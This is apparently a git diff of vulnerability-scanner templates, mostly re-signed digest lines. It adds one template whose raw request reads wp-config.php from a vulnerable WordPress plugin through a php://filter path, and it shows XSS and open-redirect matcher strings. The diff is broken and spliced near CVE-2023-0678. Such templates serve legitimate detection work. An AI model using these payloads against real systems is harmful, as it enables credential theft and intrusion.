4b0a00483046022100bee894518d0df5b4a5fb8ca9f0483c5c30d8820a121cd0c4cf47e5749e14e6b1022100891072b4407c52cbc62bfa211b7b3a2a4d05c4ccebf5731125a1a427cb36b9a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46071.yaml b/http/cves/2022/CVE-2022-46071.yaml index e13c760120..b4b8c945ae 100644 --- a/http/cves/2022/CVE-2022-46071.yaml +++ b/http/cves/2022/CVE-2022-46071.yaml @@ -46,4 +46,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "Helmet Store") && contains(body_2, "Adminstrator Admin")' condition: and -# digest: 4b0a00483046022100e38003bb227b2a0ee28138a133baa0c7cbff87df442b4d436c95e22f069c01c6022100b668d40fffe8c73afd745058690d117216ccd43e8262d7d89493a9e84fccd455:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008a28b99414d2dfa37f05b900afd1ede85d6928122a9802832f8cdf91a3f64cb90221008f371160f0cb6a42a2d306a44bbfc66fe9117fac833e12ef28a93ab878e58bbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml index fd2e640292..723262ce8d 100644 --- a/http/cves/2022/CVE-2022-46073.yaml +++ b/http/cves/2022/CVE-2022-46073.yaml @@ -41,4 +41,4 @@ http: - 'contains(body, "Helmet Store Showroom")' - 'contains(body, ">")' condition: and -# digest: 490a00463044022071d5b0bf676d8db264bdf220557c2b62075a246f4c0f0e9c4409ce715f47fc06022018a412d955fdabb7a5d78e1e48005ad14560c7850f9050f52ae977c6f89204d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ed99835750f27c932a666b47b8ed34582dba5c25daf8c74117a8db9617cbf2b9022100b765f603c369d4027a97f08b675357a4d3f582d39d36c3c9d7b518960c0d05c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46169.yaml b/http/cves/2022/CVE-2022-46169.yaml index 739fe38250..d3e88d94ac 100644 --- a/http/cves/2022/CVE-2022-46169.yaml +++ b/http/cves/2022/CVE-2022-46169.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c76ca351d3f4a02da33b7ce25801a1ee950011f2b51249fc161ef7e1501181ee02203e155b2386069106e2bbf8f9ac4f3be088aed21dca1a12c0665b1fb490291808:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022071f74228b25467f72a73a0de7752856fcc91f8007aabe12243c65efd266c964e0221008b3834ed9625a3c5474e7bbd30bdd914c70c2d10bdf64aa7f607fa97cc50acd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46381.yaml b/http/cves/2022/CVE-2022-46381.yaml index 3676dde431..ee261a0b05 100644 --- a/http/cves/2022/CVE-2022-46381.yaml +++ b/http/cves/2022/CVE-2022-46381.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fa11d12e41dc8a64370856b80de4a118eb3710349eb33dc7215ceb00acf70da2022100b092fb668aa9553fa2986dc79c20f256f21bc5d522338c3119554ec655f76da3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202d49a19c38ab4b9a901abd5e6c90fef4882504cb73444882c2105d186ec64932022100ccca00e7eaba64835c620d5df47e2aad6ee450f81abf2f755260439020d500ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46443.yaml b/http/cves/2022/CVE-2022-46443.yaml index 4cf6713209..0fa198b5eb 100644 --- a/http/cves/2022/CVE-2022-46443.yaml +++ b/http/cves/2022/CVE-2022-46443.yaml @@ -51,4 +51,4 @@ http: - type: word words: - '{{md5({{num}})}}' -# digest: 4a0a0047304502207597df0823f376ee6ebf71920f340030b21d597a1de3a890a49dfe945d2abbc20221009091e27f8aed9a69d35576fdd0678033fcd5db90698742508cfcbcd4b78c76d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a3a16c285bb2bbd0ca79228c15a194013e67e2f1d1e2429058ff03750383e808022062c6d347e89f8c3a09499dbc165cb56c864338da5d2dd6976f9a776f7dcef0c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46463.yaml b/http/cves/2022/CVE-2022-46463.yaml index 0f51e26e8f..142020dcbe 100644 --- a/http/cves/2022/CVE-2022-46463.yaml +++ b/http/cves/2022/CVE-2022-46463.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022007a644e9282a6e0c4eb96e25dcb30783ade9b589526e49047081d9f288ff95ab02206a326c5a55f7d2dd143a0dea8fadf6c33f87bd0745902fc592d3ef671c35c995:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ae28ae8282c8eb129103ba15f2fd67f65c28194c70a1af8a99f9fc022671ca82022100b90c66835be66c887739e09bd92a805dd35a406549624e51b00d6219a27c7810:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47002.yaml b/http/cves/2022/CVE-2022-47002.yaml index f1687f0b4d..7e75887974 100644 --- a/http/cves/2022/CVE-2022-47002.yaml +++ b/http/cves/2022/CVE-2022-47002.yaml @@ -76,4 +76,4 @@ http: - '"lastupdatebyid":"([A-F0-9-]+)"' internal: true part: body -# digest: 4b0a004830460221008a52969930732a6beaf5978e898d8f029dddeede46ca22999adbf6d94c14023f022100d80ebb6b5a23d3f0e3eba95d296b2803bfe4f785c9e3b72467335b9aabe14841:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e3097e1250b20cab477464c81fac1ed317a7219c4e7a2c1a708487b21d40dd1d02202a1a5c6c96fb4cb4b010a4a7fc3023d770492fb35b2e1291eca3d007beb48c8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47615.yaml b/http/cves/2022/CVE-2022-47615.yaml index 04cffd4753..79ca1ad0db 100644 --- a/http/cves/2022/CVE-2022-47615.yaml +++ b/http/cves/2022/CVE-2022-47615.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a3060e7f4ecbf2b9276a5918724298da87e4422ec21af6c5b0e4fe27be6d1b3b02206b4876a09c191055296da84753b363434be22f1f6ee28d3018c8921580a73b4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205e9ec553e489d577c4f95c9ab6a58c65d2697e33577bbeb887bdca3fdd7eb11c022100e65fc1ff00cfb250ace1c8561fd251745f59695c763eb6813cdb77a9ea6f7d85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml index d9f17e6787..d94cd6858d 100644 --- a/http/cves/2022/CVE-2022-47966.yaml +++ b/http/cves/2022/CVE-2022-47966.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 500 -# digest: 4b0a0048304602210087c4a0ad2e75ef502e57f7881eceaba2c91cb917ccbbb254f939abb10e9549ba022100d04542e9d60d83d21d152f225cba5cfcdbf4bbe18198b2c03e9e69262a5c9b35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206656a0fc37b7f0312aac5169982c93b4aac3020a2f6b2467e912d8c9933b6e9d02203bf33f091982581911fac44f49b846db225def97cd5c8621957b4764b3a8dff4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-48012.yaml b/http/cves/2022/CVE-2022-48012.yaml index e512208648..3ddb48c252 100644 --- a/http/cves/2022/CVE-2022-48012.yaml +++ b/http/cves/2022/CVE-2022-48012.yaml @@ -54,4 +54,4 @@ http: - contains(body_1, "opencats - Login") - contains(body_3, "") condition: and -# digest: 4a0a0047304502202c6eb52f1d2f566259887f058ba50faf033ad1b573073241492c16a075c637cd022100e73547d9e58f8c2febd245795c8ccc46cd85bdef99881b612bf286c33a367ab7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bf1b87f270fb0aed2ab736915be3ec75e3b98c425a01af5211530e7e237f0416022028819402aebde09c1e9765f00d4697a0b9ed5af68ca77d5f46730f06ab241275:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-48197.yaml b/http/cves/2022/CVE-2022-48197.yaml index 2b4a321722..5afec525f0 100644 --- a/http/cves/2022/CVE-2022-48197.yaml +++ b/http/cves/2022/CVE-2022-48197.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100df69eb43618830d920a6543f4f7bf0096b3ef3f0a2970503c2fc2c4dae8fc9dd0220328c90c1ed27f54dc2c80310970db1bee0bee174a428ef8c93df0568ac5e3d2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f7c3d9fc5175b9363d49c28f2e0b92b6fe9f8abc45059059ad0dafba85fea07f022100fb41b72abfbecfa5569be46ea5a0b6291531324d31b317b2be2d9e4e7a366e13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0126.yaml b/http/cves/2023/CVE-2023-0126.yaml index 06e6ffbe51..abfe116aa8 100644 --- a/http/cves/2023/CVE-2023-0126.yaml +++ b/http/cves/2023/CVE-2023-0126.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f38431ccf1845254ef4cec2d6669a1fabe785923f988c44934e26e21ab1ad868022027b10f932c802a765bf2eb73243f63f18a4e8a48851ccc41c93f8147596b340e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200389081a932ced2d9a9428eabc1ee2915f6f625fed573338636978dbcba058d0022100fa051ef2ac0253e86556778b0ce71fb678f577a2bfab19ae5d126ca0706da96f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0159.yaml b/http/cves/2023/CVE-2023-0159.yaml new file mode 100644 index 0000000000..62bb1475b4 --- /dev/null +++ b/http/cves/2023/CVE-2023-0159.yaml @@ -0,0 +1,49 @@ +id: CVE-2023-0159 + +info: + name: Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE + author: c4sper0 + severity: high + description: | + The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains. + remediation: Fixed in 1.9.1 + reference: | + - https://wpscan.com/vulnerability/239ea870-66e5-4754-952e-74d4dd60b809/ + - https://github.com/im-hanzou/EVCer + - https://github.com/nomi-sec/PoC-in-GitHub + - https://github.com/xu-xiang/awesome-security-vul-llm + - https://wordpress.org/plugins/extensive-vc-addon/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-0159 + epss-score: 0.00199 + epss-percentile: 0.56869 + cpe: cpe:2.3:a:wprealize:extensive_vc_addons_for_wpbakery_page_builder:*:*:*:*:*:wordpress:*:* + metadata: + vendor: wprealize + product: extensive_vc_addons_for_wpbakery_page_builder + framework: wordpress + publicwww-query: "/wp-content/plugins/extensive-vc-addon/" + tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon + +http: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{"status":"success","message":"Items are loaded","data":' + + - type: status + status: + - 200 +# digest: 4a0a004730450221009c218f291c5363beefd7ce01020284bf03b70918ba816b90527242a2167e5b85022014a99ea6fb8ea862e3d2983fa1fa38e7e3fc0e4d3cd8e49d315b0226c8027209:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0236.yaml b/http/cves/2023/CVE-2023-0236.yaml index 26e6594e02..b5fbe5c507 100644 --- a/http/cves/2023/CVE-2023-0236.yaml +++ b/http/cves/2023/CVE-2023-0236.yaml @@ -48,4 +48,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Instructor Registration")' condition: and -# digest: 490a004630440220612e1b28714f886d0594d3c9424a1b86fd7916f6d6348594fd672df11fb0d94602204c6641cc6d282eb84550ca1c129fc806536aab79cc83d778e6fd3976f2b98bd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100daa47e8a4a0788475b79a18cbc1ad7c5a77b7eb596d483b673abb302bc1652560221008be0757737078d080d1fae62c765719987415565af3c11d18506449909548690:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0334.yaml b/http/cves/2023/CVE-2023-0334.yaml index 30e4a1049f..f690848cd6 100644 --- a/http/cves/2023/CVE-2023-0334.yaml +++ b/http/cves/2023/CVE-2023-0334.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "shortpixel") && contains(body, "")' condition: and -# digest: 4a0a0047304502200501fef6f774734096569abd005d4c010a5b5164e6e9b41793da85fc85408ae4022100a210c048bf4fcf984728de8c6a9de632de2431921e8b1939ee18a87d4bb22367:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203508d5e191b0f01786fb58c69f6f58561b03fb802660cf3d9897bc32149c97b6022100c2759cc2f8e2cd0d0da129288ab33ee23dadc2e8c4ee0e78c6d5d4591758c2f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml index 8df794d244..98d83b6ae2 100644 --- a/http/cves/2023/CVE-2023-0514.yaml +++ b/http/cves/2023/CVE-2023-0514.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Member Database")' condition: and -# digest: 490a0046304402207af87deab40d4a05398ae43a54ff1d0d321415018f19b317adf1c2a552680cf5022075d255b19547b65093087a463ed97ebf4abf2d3d68fc741f6bd415ff2231b609:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f0422b248523ed3922d1453f05cf58d5f60c4ae304a8a6f2ecaff8009992d6b022056ea05f2741c237996bb80986bc2a280c311a1d9802f2ae9e9e5a71038db2be2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0552.yaml b/http/cves/2023/CVE-2023-0552.yaml index 3dab61cfb1..ac4799a04d 100644 --- a/http/cves/2023/CVE-2023-0552.yaml +++ b/http/cves/2023/CVE-2023-0552.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' -# digest: 490a0046304402201ab8dcd9693d8e9c7b7e3c2ac162de7610f21d7c3523e623a005ecdeababa57902203039fe388db8f4aef6c49c40a2cff545792484a6dda13261675b612810c874f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009a43102975ca9cbbf8f2d57a5f3a53496de4ac374bde3bcf0ee22cd7990f8c820220148b4d4d1ca0ef65545d30ac6b9ae93ed2bbf928f8b3e981e19fc44b2a19c151:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0562.yaml b/http/cves/2023/CVE-2023-0562.yaml index cbf69f732a..64a16cf314 100644 --- a/http/cves/2023/CVE-2023-0562.yaml +++ b/http/cves/2023/CVE-2023-0562.yaml @@ -47,4 +47,4 @@ http: - 'contains(body, "admin")' - 'contains(body, "BLMS | Dashboard")' condition: and -# digest: 4a0a0047304502204269a26e49a28b0389027a7bb4ea450c39c6c56e530eeab71b2b39f64bf46de5022100b5bc1eb01c383f79ca1d31e163316ab6f30854c6beb40caaecd08063507509b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a83e4f426dee5b966ea13ce961702c3c9f146fb91cc171084ddc7b338df6982802205438c91226989896a74aeeae0b041231e409cadbe2eda2301ea0bb1d7eeab9ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0563.yaml b/http/cves/2023/CVE-2023-0563.yaml index b7de462860..697aba6c71 100644 --- a/http/cves/2023/CVE-2023-0563.yaml +++ b/http/cves/2023/CVE-2023-0563.yaml @@ -47,4 +47,4 @@ http: - 'contains(body, "/>")' - 'contains(body, "Bank Locker Management System")' condition: and -# digest: 4b0a00483046022100d68211d4a4708e3b4f1129355ec622509dce50544729b3633fbff87f3ab980d70221009e4465ae62e1a5a807db6d96f1bd7c700c2628c89e06b8479377bc632c38a6e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d454a122aad91e9dea4225555e6ced18d36bd03530358996ae175eea4f59a9cc022100e8591a78edb324b44d798e9732dd1eef101ead3d5e1f2de0e91e951457f2293a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0600.yaml b/http/cves/2023/CVE-2023-0600.yaml index e55c4d4e82..5cf087ab03 100644 --- a/http/cves/2023/CVE-2023-0600.yaml +++ b/http/cves/2023/CVE-2023-0600.yaml @@ -58,4 +58,4 @@ http: - 'status_code == 200' - 'contains(body, "sleep(6)")' condition: and -# digest: 4a0a0047304502207115e190a4724c440c07ab5d6f8054a9f5d7549a385ef47e66576055cf2315cc0221009dc5da73bf013f53d8c51c8c6aff257d4f5063f1a78963dc43befb923d79175c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220261580cf7a6acf3bd48c82b17b9befe18160f0f95f445a299f518bc9a852492902200976177287be838bdccc1077745ec0a5fb67ea2cbf3048964a74b82748fadfed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0669.yaml b/http/cves/2023/CVE-2023-0669.yaml index f9e67012c3..5cfa80b391 100644 --- a/http/cves/2023/CVE-2023-0669.yaml +++ b/http/cves/2023/CVE-2023-0669.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 500 -# digest: 490a0046304402201406a996c751500e8f8f03232cab9c9a923abf327e2378ae1b094d9a617bb7d902207e615dceea013c99240a4e36650bc199c19961b66ad59cf47e8523a71fbe0e3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220207c735e2469d6bf2af5178c7053b234490ccaa8584d568bb036adcc0ca0e16c022100dd5efb4ae7b7db86c7b6caee1806c494eeb8c6ce825ea4d94c449c4a09f4ff96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0678.yaml b/http/cves/2023/CVE-2023-0678.yaml new file mode 100644 index 0000000000..492f3fd699 --- /dev/null +++ b/http/cves/2023/CVE-2023-0678.yaml @@ -0,0 +1,34 @@ +id: CVE-2023-0678 + +info: + name: PHPIPAM Log Out' internal: true -# digest: 490a0046304402207be51621913956682529761bdc463fc049801e290b4101be71e7589e8c20009e022073af0e380ffe2edd01a7f422feae41ee96f742d6720817f4138655b2c2fd30a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205451db383786918c1f14b6751c0ffaeb263600bab8cc76dc938cf3e1847531b902203c9a566e2f17d7cd2501e5dad53491de15f0dcbe0b569a5be1a41ca489e8b894:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0942.yaml b/http/cves/2023/CVE-2023-0942.yaml index 01a7dfefb7..e882c0a3ab 100644 --- a/http/cves/2023/CVE-2023-0942.yaml +++ b/http/cves/2023/CVE-2023-0942.yaml @@ -49,4 +49,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "") && contains(body_2, "woocommerce-for-japan")' condition: and -# digest: 4a0a00473045022100940f186aaf826122d5b1b6f19b629b745ed9dda0abadd065fbafb924c091077302204da6954f42e3534c47433cf461e3a09a30c0ef39f5aa2ca05e2208732c5760c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a6154be3977335b0b6a8edafe8ebf0cdc8be8592b0dde724b514055ced4fc0e022100935f1df2f35df2ff8160527c45087dc5c1a387351a1dcc8ea9fea63d30041d53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0947.yaml b/http/cves/2023/CVE-2023-0947.yaml index 23e8df985c..69843c26b2 100644 --- a/http/cves/2023/CVE-2023-0947.yaml +++ b/http/cves/2023/CVE-2023-0947.yaml @@ -39,4 +39,4 @@ http: - 'status_code == 200' - 'contains(body, "Index of /fp-content")' condition: and -# digest: 4b0a00483046022100b96728103c78973df20345bccdd4fa400d8c9953899958cf90ca211302d68ede022100cf500fda875cc93c2796482ac8a2952f73a26624624739611a6025012a1357c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a6fad072aa7b7a33eeb7febfa517c81a87cdd0458f78e659f4436d97e14cda8c02201122c5d07ec27092761f1e6d267c54e6cd56b9d6df20fe247ee60f0783601bd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0948.yaml b/http/cves/2023/CVE-2023-0948.yaml index d4531dc8dd..39f153eda8 100644 --- a/http/cves/2023/CVE-2023-0948.yaml +++ b/http/cves/2023/CVE-2023-0948.yaml @@ -49,4 +49,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "peachpay")' condition: and -# digest: 4a0a00473045022056e7528c80dc971b5f99ae803a68c481ce378504b7edeb7230000b49468bb12d022100a37f46c49c0e71a86d0d1e2b46ccc4c49c7dde7d1599e4acca5e911021ae6afc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207489300b27fc604ebc086d2dcf53a066f713bf6e155fc3d7e796b5d5e7073f41022100d763b61ecc36c48a60e65fcac863f65fb4d354916e78aef5854c9720707c38f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1020.yaml b/http/cves/2023/CVE-2023-1020.yaml index b1d60a6bc8..9acbdeec07 100644 --- a/http/cves/2023/CVE-2023-1020.yaml +++ b/http/cves/2023/CVE-2023-1020.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200a48bbadc18205835fd1e119fb3e52bc052c9f5ee67bfd77ad8701a755fa012f02210080fdbee11d6a874e357eb5f9d25f3c4b86941c11a926974aad67fa5341a8b87b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fac5c85ebe071ae5ef03e6745f869794a516d4dd1a7fd22f58ec3d490039c84c022100cafea571a15f3be63d57818f9c9386f1433fe77561b33395aeb30cde8b682100:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1080.yaml b/http/cves/2023/CVE-2023-1080.yaml index 812dc0c968..9a7d4ce305 100644 --- a/http/cves/2023/CVE-2023-1080.yaml +++ b/http/cves/2023/CVE-2023-1080.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "/ onmouseover=alert(document.domain);//")' - 'contains(body_2, "GN Publisher")' condition: and -# digest: 4b0a00483046022100927bdaa7dde317cfb768be6f9816c8ca72bda2ecf694bda8062b2831c8bdfb36022100d662f3a45103836cdd3660c62bb334e35a31cc54abd43db563d320bab79bb78b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009e1ffc42fadc2223a2bde2cfca3d21b2ccb40f02c1ccf27a1ded4325da215dfb022100fd1a246c50613256dcd59279b3f0ea4fcde05ce171adfeabd1d5068a35986ed9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1263.yaml b/http/cves/2023/CVE-2023-1263.yaml index 08482dcb85..3ff851d678 100644 --- a/http/cves/2023/CVE-2023-1263.yaml +++ b/http/cves/2023/CVE-2023-1263.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203e52fada39487521fb6d464b81b7e6af2f8c64ce39327c81a4168dc2d7418ee702201d0788e2630ee59a9e793bcc71446bc0bea0d2b64ce45e58c6de2b0bac061f98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022011e5f903b0a93f9e3c06ec147cc8c3f99a9d83b16945cc273a867de1c81ea74e0221009f399c551bcf521294a213c1b973399eb02bea51059fdf559b11acf56aff52ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml index 0c41c94a32..475f7f3a27 100644 --- a/http/cves/2023/CVE-2023-1454.yaml +++ b/http/cves/2023/CVE-2023-1454.yaml @@ -67,4 +67,4 @@ http: - "XPATH syntax error: '([a-z- @%]+)'" - "XPATH syntax error: '([a-z@%0-9.]+)'" part: body -# digest: 4b0a0048304602210094f2730d7dfcd48ee60dd0ff7f489a65e7b2509f1eb34ba254847ae14ef847ba022100b9d18ed0259a8c4af45d666e61475544a2ebf7d6a0c52461c7c52a50eae4f577:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201617c97220bd0ac605e36efc6731e6e680ab819a2d613804423de883aba8d1eb0220562bcbd34db0c1ce70cd835193e6819e76e7cef2925feda6621420165482860b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml index 60053821b1..ea5d2f901e 100644 --- a/http/cves/2023/CVE-2023-1496.yaml +++ b/http/cves/2023/CVE-2023-1496.yaml @@ -44,4 +44,4 @@ http: - type: dsl dsl: - content_security_policy -# digest: 490a004630440220409b83ed0835b224a0a9f95f8a78071fb1831fbde406a1beb982e2c9a986e2690220207bd6d446e8ffe17eb6f88b87533e9c73b781b651170f1ce7c857199ac4ca28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202ad789f0ac262a3012d88a82fabcb0495918466b6945c80a40a9cf0f17501756022100fcd6b4965a63afc6ed0a5933664366f832ca12cc04bd2e4809dbd1fec88dc51b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml index 9ed9df9ec5..b2c83a3a55 100644 --- a/http/cves/2023/CVE-2023-1671.yaml +++ b/http/cves/2023/CVE-2023-1671.yaml @@ -53,4 +53,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4a0a00473045022070c63439edc631c3baa03976236d363cc658f466781e06a13b5492c766b90473022100ef554c676f309bff4a996864db78a7216f219bf72affe97625626839479d1e13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ae0e465ec75fd0a4861424e3aad7f02640cf6221038527efafe82c6742e6737002206c97e80f7b304f7c6b2617847d8a6c3bc6133ac27161b8921c0781f00317ca0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1698.yaml b/http/cves/2023/CVE-2023-1698.yaml index 859c29191f..905690f7d5 100644 --- a/http/cves/2023/CVE-2023-1698.yaml +++ b/http/cves/2023/CVE-2023-1698.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022010b71709e17946230c3005b376ceb98ba3b38a8d3af9f73f2307bb45bf4ee87b022100d3aa8bd8c9bb40ffa4f168d74b42a9607bb5c3e3a2c049a914654420f1f33848:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b407d13bb092bfd293626f93b9765b760fc504f78be29190689950f60041a7bf02200e23d21826874028db946e7c4a4af5e0b05de0bed54232eb4b63c39eb70fe3aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1719.yaml b/http/cves/2023/CVE-2023-1719.yaml index 0c8bbd66fa..7dff6c4314 100644 --- a/http/cves/2023/CVE-2023-1719.yaml +++ b/http/cves/2023/CVE-2023-1719.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022018dcc8bec6d27c60fd722a56d8310ee01380c42efde6680eba35b5dfca48aae2022100e10f49c69f6c593d4b4f33a6945c7f89ec821577f7842e716a4bceebf216cc8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ee017b54c73c0f61455fa03bda991d45a439666dd9865e87ae61054c61089562022036a61ac1c74ee4bdc735c1e9d6eedb6e2c5cb5f2df88ed4c4e65875d66e4f091:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml index 98be5172ea..cdb9c8fcc3 100644 --- a/http/cves/2023/CVE-2023-1730.yaml +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -44,4 +44,4 @@ http: - 'status_code == 200' - 'contains(body, "supportcandy")' condition: and -# digest: 4b0a00483046022100a1f91b6440da060ff199bc2da1249ea772722367c8b725b1bc0521066ed11989022100d6a162ee9175034213758311b998f05cf1270f11a4b60d265ec1fec93ab9d56f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 